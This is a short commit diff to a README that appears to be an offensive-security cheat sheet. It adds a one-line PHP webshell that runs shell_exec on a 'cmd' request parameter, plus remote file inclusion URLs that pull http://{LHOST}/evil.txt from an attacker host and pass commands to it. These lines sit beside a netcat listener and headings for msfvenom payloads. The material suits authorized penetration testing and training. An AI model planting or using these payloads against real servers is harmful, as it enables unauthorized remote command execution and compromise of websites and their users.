Update README.md
This commit is contained in:
@@ -1558,6 +1558,12 @@ sudo nc -lnvp {PORT}
|
|||||||
#### NC Execute - Server [STEP 2]
|
#### NC Execute - Server [STEP 2]
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
|
# PHP webshell
|
||||||
|
<?php echo shell_exec($_GET['cmd']); ?>
|
||||||
|
|
||||||
|
page.php?page=http://{LHOST}/evil.txt&cmd={command}
|
||||||
|
page.php?file=http://{LHOST}/evil.txt&cmd={command}
|
||||||
|
|
||||||
# MSFVENOM Payloads
|
# MSFVENOM Payloads
|
||||||
|
|
||||||
# Windows
|
# Windows
|
||||||
|
|||||||
Reference in New Issue
Block a user